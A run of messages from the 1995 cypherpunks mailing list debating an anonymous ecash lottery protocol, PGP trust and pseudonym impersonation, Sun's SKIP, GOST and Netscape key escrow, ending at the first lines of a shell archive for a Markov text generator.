>collecting money without awarding prizes.

Have to be _very_ careful here. A variety of scams can be developed which
show lots of "small" winners, but which fail to show any large winners. The
lottery operators can make a lot of extra bucks by simply not paying off
the large winnings, in various ways.

More robust protocols may be possible. In particular, I recall that Eric
Hughes was working on something he called "encrypted open books." While
banking was the obvious domain, it seems plausible that the same
methodologies could be adapted for lotteries (some isomorphisms between
accounts/balances and tickets/winnings?).

I don't follow Ian's proposal in enough detail to comment on it, but
thought I should point out the scams over nonpayment of winnings and the
"encrypted open books" notions (from sometime in '93, as I recall).

Personally, I have long had great _hopes_ for using crypto for
non-sanctioned gambling, but I'm pretty skeptical that many people will do
it. For one thing, anyone knowledgeable enough to be comfortable with the
crytography knows that gambling when a house cut exists is a lose. (And
gambling with no house cut is, at best, a wash.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Thu, 30 Nov 1995 13:17:05 +0800
To: cypherpunks@toad.com
Subject: Your faith is PGP is charming and quaint, but wrong
Message-ID: <199511300446.UAA19851@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



All of these articles from people claiming to be me!

I repeat, for the slow learners, that I consider PGP to be untrustworthy, at least on my machines. I don't want those Mounties to do to me what they did to Mulroney en passant. 

You in the southern colony are free to use PGP, but I prefer other means of establishing my uniqueness. Style, for example, cannot be easily copied.

I am, as always, 


  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.

                    I.  A.  M.  A.  M.  O.  R.  O.  N.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 1 Dec 1995 16:10:45 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca>
Message-ID: <qqwcFD25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


iagoldbe@csclub.uwaterloo.ca (Ian Goldberg) writes:
> So; is there a problem with the implementation outlined above?

What about the income tax on winnings?

>                                                                 If it were
> implemented, would people play it?

I probably would, if I get off my lazy ass to get an ecash account. :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 30 Nov 1995 05:33:01 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511291555.KAA02851@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129205059.29011B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, Perry E. Metzger wrote:

> 
> attila writes:
> > 
> >    what about the Sun release announced today? --it is fully functional
> > with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
> > or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
> > key management and IP layer encryption package for SunOs 4.x. 
> 
> Ah, yes. The non-standard from Sun.
> 
> It doesn't do D-H negotiation, by the way. It uses something I'd call
> inferior. Read the flames in ipsec and ipsec-dev for details.
> 
> .pm
> 
    figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
the power to make something happen on the high-power workstations, and the
fact they are making a portable package available in source code is
farther than anyone else has gone. 

    my experience over the last 15 years with Sun is that they do listen 
to outside "noise" and will move forward.  I for one will be contacting 
my Catalyst rep and the software develop group; the time has passed when 
you could get Andy, Bill, or Scott on the squawker.  I did complain to 
Scott about Catalyst changes --I did get a nice letter back, but I doubt 
it was authored by Scott.  Andy resigned last year, and I have not heard 
from Bill for years.

   other than the inferior method v. DH, is there anything else missing; 
I will probably pull the code package of the developers' access machine 
before the week is out just to take a look.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:30:53 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <ace26afe05021004e5e0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 AM 11/30/95, Dr. Dimitri Vulis wrote:
>iagoldbe@csclub.uwaterloo.ca (Ian Goldberg) writes:
>> So; is there a problem with the implementation outlined above?
>
>What about the income tax on winnings?

That's a good one! A bit subtle as humor, though.

(For many of us, even most of us, the whole _attraction_ of such gambling
schemes--to the extent any gambling scheme can ever be attractive to a
rational person--is the tax avoidance. And any scheme that allows taxation
of winnings, but not losses on individual bets, would kill this proposal
dead.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 14:09:44 +0800
To: attila <hallam@w3.org
Subject: Re: WTO an even worse possibility as Inet regulator
Message-ID: <199512010519.VAA12922@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 PM 11/30/95 +0000, attila wrote:
>	<attila sez>  but WTO is also accumulating a rather larger 
>    bureaucracy and is challeng Uncle Sam on severl major unilateral
>    actions.  [...] and it will be by the WTOs and world courts, or the
>    Rockefeller NWO --read UN, and UN troops in America. 

This is excessively paranoid:  The main threat to freedom is still
internal, rather than external.

The major expansion of WTO power came because of the notorious
corruption and one sidedness of American courts judging disputes
between foreign and American businessmen.

Since WTO courts do not have WTO gunmen this amounts to a major
separation of judicial and executive power, thus though it is
a centralizing move, it is also a move that favors liberty an
the rule of law.

Of course the first stages in centralization always do, at first,
favor liberty and the rule of law as they restrain corrupt and
lawless local powers.  Later, much later, the centralized power
becomes a greater threat to liberty than those local authorities
that it restrained.  

That stage is still a long way down the track, and very likely 
the modern nation state will collapse first.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 12:42:13 +0800
To: cypherpunks@toad.com
Subject: Fertile ground for papers....
Message-ID: <ace26c630602100439cf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:22 AM 11/30/95, Pete Loshin wrote:

>In any case, using such a "public" and daily number
>eliminates the problem of proving the game isn't fixed.

Maybe.

In passing, the whole field of cryptography is filled with interesting
papers with titles like "How to toss a fair coin over the telephone" and
"Avoiding double spenders in digital money systems."

Meaning, how robust cryptographic protocols can be used to avoid scams
familiar to the most junior grifter.

The theme of "proving anonymous betting schemes are not fixed" is in the
same vein, and could establish the reputation of any budding Amos Fiats or
David Chaums out there.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 16:13:58 +0800
To: fluffy@shout.net (Chris Stillson)
Subject: Re: GOST for sale
In-Reply-To: <199511292216.QAA25781@duracef.shout.net>
Message-ID: <199511300239.VAA16572@homeport.org>
MIME-Version: 1.0
Content-Type: text


Chris Stillson wrote:

| What I wonder about is why anyone would use the Algorithm
| that the NSA is probably best at breaking.  Breaking GOST was probably
| their number one project for years, and I would suspect that they
| have done it.

	Bamford (The Puzzle Palace) suggests that no major Soviet or
American cipher has been cryptanalyzed since the early 70s or so.
Ciphers are chipped at by theft of keys by spies (The Falcon and the
Snowman) or military action (Seizing the Enigma).

	Also, you have to ask yourself, would the NSA reveal its
ability to break GOST traffic?  (I think it was Seymour Hersh who made
the claim that the Bush administration gave Yeltsin real time breaks*
of Generals plotting against him in the '92 coup attempt.  In
evaluating this claim, remember Bush ran the CIA for several years.)

	(*It also might be that the messages were not protected by
GOST, were obtained by bugging in a room, or other nefarious means, as
I'm sure the NSA would attest if it came out that messages were
actually passed.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Thu, 30 Nov 1995 23:01:10 +0800
To: cypherpunks@toad.com
Subject: Internet gambling
Message-ID: <199511300541.VAA04276@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



My favorite numbers game is "fixed".  Choose a number from 1 to 1000.
The least chosen number is the winner, and it pays off 1000:1.  This
least chosen number would have to be published in some non-repudiatable
way, but that's not too hard.  The fun thing is that you get to play with
the minds of all the other players...when would be the first time that
the same number was the winner two days in a row?  Or how many times
with 666 be the winning number?  Or whatever.  Bet all numbers, and it's
a wash.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Thu, 30 Nov 1995 16:03:52 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
In-Reply-To: <199511290507.VAA10591@jobe.shell.portal.com>
Message-ID: <49j6ot$5t1@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:

>PGP is really not the issue.  The issue is more my security and the
>environment that I use PGP in.  I don't have a trusted machine to run PGP
>on.  Anyone who wants to can come up to machine and copy my secret keyring
>or they can even watch me typing my password in. 

Oh, puh-lease.  Do you often send anonymous mail to cypherpunks with your
co-workers and friends looking over your shoulder?  So much for your
anonymity and security.  I dunno about this theory of reputation stuff,
but you've sure developed one.
-- 
Yea, the heavens shall open and the NP-complete solution given forth.
ATT executives shall give birth to two-headed operating systems, and 
copyrights shall be expunged.  The voice of the GNU shall be heard,
but the faithless will be without transcievers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 30 Nov 1995 14:13:21 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511300602.WAA13054@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

Sorry to follow up on my own post, but I made a boo boo.  A real, big
boo boo.

On Wed, 29 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> On Wed, 29 Nov 1995, Adam Shostack wrote:
> >
> > 	I don't follow.  You're claiming that PGP is good enough to
> > transfer OTPads, but not good enough to sign pseudononymous messages?
> 
> Sure. Two different situations.
> 
> If I take a message or a data tape and encrypt it with a one time pad.  
> 
> And then I send the message out to someone via Greyhound or DHL.
> 
> And once they've confirmed that they have the encrypted message safely in 
> hand, then I'll call them and ask them to call me with their public key
> delivered by voice via telephone.

Actually, I made a big mistake here.  It's not good enough for me to
call them.  Usually I have them first call me, and then I call them
back.

I learned to do this in real-estate when I had my property management
company.

Very often, someone would call the office, and say something along the
lines of "This is Constable Acheson, from the Calgary City Police.
Could you please tell me the forwarding address of your former tenant,
Alice" (or Bob, or whatever).

My standard response always was to ask for whoever identified himself
as "Constable Acheson" to provide his division.  Then I'd hang up,
check the number for the main switchboard in the phone book and then
call him.  This way, I'd be sure it was actually him, and that he was
calling from where he claimed.

You'd probably be surprised (or maybe not) how many times, there was
no such Constable.  Luckily, I just didn't give out my information to
just *anyone*.

And the same stuff applies here ... with reading and verifying the key
over the telephone.  With the phone call there should be a hangup and then
some third-party authority to confirm that the channel of communication is
*really* a valid channel. 

Sorry, about leaving that part out.  

It was a boo boo, eh?  But it's important, RL stuff.

> Which I then use to encrypt the one-time-pad, using the PGP key only once.
> 
> Then, I'm comfortable sending it (not the message, but the pad) over the 
> Internet encrypted with PGP.  And I think at that point, I have Pretty 
> Good Privacy.
> 
> > Adam
> > 
> > -- 
> > "It is seldom that liberty of any kind is lost all at once."
> 
> 
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
> 
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 

Yep, it was the real me this time ... and no, I didn't add another
"signature" encrypted or not encrypted to the bottom of this post. 

Let me ask this though??  Would the "quality" of my post changed one way
or another, if this was signed, or not?? 

IMHO, the message should make sense (or not) either way.

                           ... Alice ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 30 Nov 1995 16:03:36 +0800
To: Pete Loshin <cypherpunks@toad.com>
Subject: Re: "Proprietary" internetworking protocols (was RE: The future will be  easy to use )
In-Reply-To: <01BABE83.A3A80240@ploshin.tiac.net>
Message-ID: <9511300318.AA02710@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Both Netscape and Sun had a product that had a large number of seats. From what I 
have seen the POTP have diddly squat in the way of seats.

Looking at the market today it is clear that there are fewer oppotunities to do that 
type of roll out. Netscape and Sun were running just ahead of a market. Today I 
don't see how many people will want to abandon PGP for a product that is 
indistinguishable from smoke 'n mirrors.

	Phill
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 11:55:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: key for Alice as promised (not) (fwd)
Message-ID: <199511300318.WAA16662@homeport.org>
MIME-Version: 1.0
Content-Type: text


>On Wed, 29 Nov 1995, Adam Shostack wrote:
>
>> > PGP is really not the issue.  The issue is more my security and the
>> > environment that I use PGP in.  I don't have a trusted machine to run PGP
>> 	Threat, please??  Do people often stand over your shoulder as
>> you type?
>
>Yes.

And you can't ask them to leave, as you send anonymous messages?  Or
does your whole office know your one of those who post to cypherpunks
as Alice d' nonymouys?

>> Have you considered putting the secret keyring
>> on a floppy and locking it in your desk/safe when you're not actually
>> in the office? (Or home..)
>
>Yep, I've considerred it.  It's still not all that helpful.  Cleaning 
>staff has plenty of time when I'm not around to deal with that.

	Of course, if the cleaning staff cut your safe open, you have
a good indication of that in the morning.

	Not that you've demonstrated that the level of effort to do
all of this at all equates to what is gained, namely, the ability to
impersonate you.  Which everyone in the world has today.

>> > So, I don't fool myself, and I don't use PGP, except for things like
>> > exchanging a one-time pad with someone when I've already sent the message
>> > out across another delivery mechanism, like on a floppy delivered my
>> > courier. 
>> 
>> 	I don't follow.  You're claiming that PGP is good enough to
>> transfer OTPads, but not good enough to sign pseudononymous messages?
>
>Sure. Two different situations.

[...]

>And once they've confirmed that they have the encrypted message safely in 
>hand, then I'll call them and ask them to call me with their public key
>delivered by voice via telephone.

>Which I then use to encrypt the one-time-pad, using the PGP key only once.
>
>Then, I'm comfortable sending it (not the message, but the pad) over the 
>Internet encrypted with PGP.  And I think at that point, I have Pretty 
>Good Privacy.

	Of course, then your message only has 128 bits of security,
because the Greyhound or DHL employee could be easily comprimised, as
could the message in their office.  So you encrypt the pad with IDEA,
getting you IDEA level security, and think you're working with one
time pads??

	I'm flabbergasted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Thu, 30 Nov 1995 12:04:30 +0800
To: "'cypherpunks@toad.com>
Subject: RE: ecash lottery (Was: ecash casino)
Message-ID: <01BABEA9.4771C9E0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote: 
>
>Here's an off-the-cuff idea:
>
>[Disclaimer: The following post is a gedanken experiment.  It should not
>		be interpreted as condoning or encouraging anyone to break any
>		laws, no matter how stupid the laws are.]
>
>Anonymous email lotteries:
[details deleted]
>A lottery consists simply of displaying the winning number and random
>noise, whose hash was previously posted (so the participants know
>you're not cheating).

Traditional illegal numbers rackets usually use some
publicly available number so everyone knows it's all
on the up and up (I used to know what the source for
the winning numbers actually _is_, though I think it
has something to do with the stock market, e.g., the
last three digits of the number of oddlot trades, or
something else that is usually essentially random.

In any case, using such a "public" and daily number
eliminates the problem of proving the game isn't fixed.

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 30 Nov 1995 14:39:26 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <199511300621.WAA26406@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 20:38 11/29/95 -0800, Timothy C. May wrote:
>Have to be _very_ careful here. A variety of scams can be developed which
>show lots of "small" winners, but which fail to show any large winners. The
>lottery operators can make a lot of extra bucks by simply not paying off
>the large winnings, in various ways.

With complete anonimity, the scam I would think of first is giving other
nyms of myself all the big payoffs.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 14:41:57 +0800
To: Laurent Demailly <iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <199512010624.WAA16728@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 11/30/95 +0100, Laurent Demailly wrote:
>'small' questions about inet gambling
>
> + How do you complain that you didn't got your win without revealing
> your ID ?
>
> + Alternatively, How do you prevent false complains or nasty
> concurrent trying to trash gambling co reputation ?

Gambler submits a value that contains a hash of his guess, plus
random noise, plus some random numbers resembling random noise
that if signed by the bank will become anonymous ecash (once
deblinded).

Lottery has to acknowledge payments by signing the hashed
guess,

After the drawing, if the lottery cheats, the winner can prove that 
the lottery cheated by anonymously revealing the values that when
hashed yield the number signed by the lottery.  If a disgruntled 
person makes such an allegation, then in order to prove they
did not cheat the lottery must anonymously reveal the numbers
signed by the bank.  If the reveal this, this proves they are 
fine, and also pays the gambler, because he holds the deblinding
factor which will turn those bank signed numbers into money.

Thus not only can it be carried out anonymously, but disputes
can be fought anonymously.



>
>regards
>ps: it would be easier that the game is legal so ppl can play without
>being hidden... In my current casino, most people do complain when
>there is a problem, and I think that those who don't aren't because
>its monopoly money or just they aren't paying much attention...
>
>dl
>--
>Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
>Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
>
>jihad Ortega Qaddafi Legion of Doom South Africa KGB Uzi
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 30 Nov 1995 06:55:12 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511292128.QAA03706@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129221922.23090B-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


   OK, I have not seen it (like I said, I will get it) or read ipsec.  

   However, despite the group ego, Sun _does_ listen and Sun does wish to 
be the leader. If the rest of ipsec group has a specific list, maybe it 
needs to presented higher up the pole.

   As fun as it might be to code it, you have enough on your plate with 
pgp alone. Sun's resources for a directed course are hard to beat; this 
is just another repeat of the first go around.  SKIP obviously will not 
fly outside of Sun without industry support and if it has long term keys 
and can be compromised, it will be a tough row to how.  time for a little 
pressure where it counts.

   the fact Sun released source indicates they are open enough to expect 
criticism.

	attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Fri, 1 Dec 1995 00:38:16 +0800
To: "pete@loshin.com>
Subject: RE: "Proprietary" internetworking protocols (was RE: The future will be  easy to use )
Message-ID: <01BABEAC.2E90BDC0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Oops, sorry about the unfortunate juxtaposition of POTP with 
the SKIP thread. I didn't mean to imply anything more about POTP
than that they were around in Boston in case anyone wanted
to talk to them.

My comments about "proprietary" internetworking protocols
related to discussion of Sun's SKIP, not at all to POTP, whose
protocol hasn't been published and won't be published if they
don't get their patent.

I was simply observing that Perry's comment:

"...an internetworking protocol [e.g. SKIP] used by only 
one vendor gets nowhere."

is not necessarily true, and pointed to SSL and NFS as 
counter-examples.

-pl

Phill wrote:

>Both Netscape and Sun had a product that had a large number of seats. From what I 
>have seen the POTP have diddly squat in the way of seats.
>
>Looking at the market today it is clear that there are fewer oppotunities to do that 
>type of roll out. Netscape and Sun were running just ahead of a market. Today I 
>don't see how many people will want to abandon PGP for a product that is 
>indistinguishable from smoke 'n mirrors.
>
>	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 1995 14:59:05 +0800
To: cypherpunks@toad.com
Subject: Netscape gives in to key escrow
Message-ID: <199511300644.WAA02011@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.cnet.com/Central/News/govt.html

	Bad. Very Bad. And I was almost starting to like Netscape.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 30 Nov 1995 15:05:13 +0800
To: Leslie Todd Masco <cypherpunks@toad.com
Subject: Re: META: Lycos & Searchable archives
Message-ID: <ace3044e0e021004a6b0@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


If you mail to an open list or post to news you are shouting through a
megaphone on a street corner. If you don't want everyone to know what you
said, use a remailer (this group above all others should do that).

        -Lance

At 9:56 PM 11/29/95, Leslie Todd Masco wrote:
>
>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos.  Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the we-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this?  My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.
>- --
>Todd Masco     | "life without caution/ the only worth living / love for a man/

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 1 Dec 1995 00:23:23 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511300354.WAA10417@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


>  And I would ask whoever DID post the PGP key under my name, to please
>  issue a revocation certificate. 
>  
>  
>  Alice de 'nonymous ...
>  
>                                    ...just another one of those...
>  
>  
>  P.S.  This post is in the public domain.
>                    C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
>  
>  


Pretender. I'm the real no-pgp Alice.



  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.
                    C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 30 Nov 1995 22:59:19 +0800
To: cypherpunks@toad.com
Subject: SKIP, NFS, SSL, etc.
Message-ID: <9511300443.AA18343@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


NFS is not a valid example of a one-vendor internetworking protocol.
In the early days of NFS Sun worked amazingly hard to get all the major
Unix players to support it.  They all but lent out engineering staff;
they hosted several 'connectathons', where everyone tested interoperability,
made the license minimal cost (if not free), etc.  And, of course, there
was nothing competing.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 23:03:33 +0800
To: sameer <sameer@c2.org>
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300250.SAA07657@infinity.c2.org>
Message-ID: <Pine.3.89.9511292329.A20600-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Deja vu?

On Wed, 29 Nov 1995, sameer wrote:

> 	I think it would be easier if the lottery owner was just in a
> safe jurisdiction. Then he wouldn't have to worry about the legality
> of it, and not worry about his anonymity. Gambling-safe jurisdictions
> *do* exist.

Wasn't www.casino.org a participant in the ecash trial run? I remember them 
having a highly entertaining disclaimer. They're somewhere in the carribean,
I think. Supposedly (so said the cbc news last year) some gent here in 
Ontario (where non-licensed gambling is of course illegal--the gov likes its
monopoly) set up the domain and the webpage and sold space on the "Virtual
Strip" to interested offshore governements. Since the actual casino sites
aren't in Canada (and probably offshore gov run) it is legal for the 
operators. It is illegal for us North Americans to use though.
I just checked the site and saw quite a few casino operations on the strip.
I didn't notice the ecash logo this time around (I'm doing this off lynx, 
it might only be shown in the graphical version). 

> 	There lies a problem if *playing* a game is illegal in the US, 
Which is what the casino.org page says.

> which I beleive it may be. If the winners can be revealed by
> bank/lottery collusion, then in order to protect the winners the
> lottery can't collude with the bank. This may not be a problem,
> because the lottery isn't subject to US law, so there would be no way
> to force the lottery to collude with the bank to reveaol the
> identities of the winners.

And no economic incentive for the lottery.
What are the regulatory hassles of setting up a gambling operation in one 
of the US states where it's legal (ie Nevada) ?
I take it it would still be illegal for someone outside the state to 
gamble using the service.

Isn't there also some Scandinavian bank that's handling ecash? It might be
hard to explain to US tax authorities how large amounts of anon currency
are ending up in one's marktwain account. In that case it might be 
interesting for someone to setup an anon service provider along the lines
of c2.org which would allow users to run java scripts, no-questions asked
(presuming this is a legal gambling jurisdiction). Java-based casinos, 
anyone? (or just normal unix c progs, given shell access)

Of course life will be much nicer when Chaum sheds his (*ahem*) ethics
and starts licensing to offshore banks. (I take it Scandinavian taxes are 
far worse than American ones. I would think they'd be less 
drug-money-laundering paranoid than the US however. Makes you wonder how
much attention the Fincen boys are giving marktwain at the moment).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 14:59:18 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512010802.AAA09494@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 AM 12/1/95 +0600, Ed Carp wrote:
>If you want to bar access to your site from a Netscape browser, such 
>can easily be accomplished.  If memory serves, every browser, when 
>connecting to a site, exchanges certain information about the client 
>with the server.  One can gain access easily to that information.

This would not be satisfactory in itself: Ideally one would like to bring
up a page saying  "Sorry, you cannot access that page because you
are using a netscape browser:  Click *here* for the sad tale of
Netscape.

>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Thu, 30 Nov 1995 13:25:48 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GOST for sale
Message-ID: <199511300458.XAA08306@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain


>>
>	I have non-commercial demo version of the product (370 Kb arjed 
>	distributive) and I can send it to people who will be interested in it.
>

Please, send it to me. Thanks. Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 30 Nov 1995 13:32:02 +0800
To: owner-cypherpunks@toad.com
Subject: Re:  Your faith is PGP is charming and quaint, but wrong
Message-ID: <9511300504.AA18396@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Style, for example, cannot be easily copied.

Au contrair.

Cypherpunks share code...

#! /bin/sh
# This is a shell archive.  Remove anything before this line, then feed it
# into a shell via "sh file" or similar.  To overwrite existing files,
# type "sh file -c".
# The tool that generated this appeared in the comp.sources.unix newsgroup;
# send mail to comp-sources-unix@uunet.uu.net if you want that tool.
# Contents:  Makefile PATCHLEVEL README markov3.6 markov3.l
# Wrapped by rsalz@sulphur on Thu Nov 30 00:04:29 1995
PATH=/bin:/usr/bin:/usr/ucb ; export PATH
echo If this archive is complete, you will see the following message:
echo '          "shar: End of archive."'
if test -f 'Makefile' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'Makefile'\"
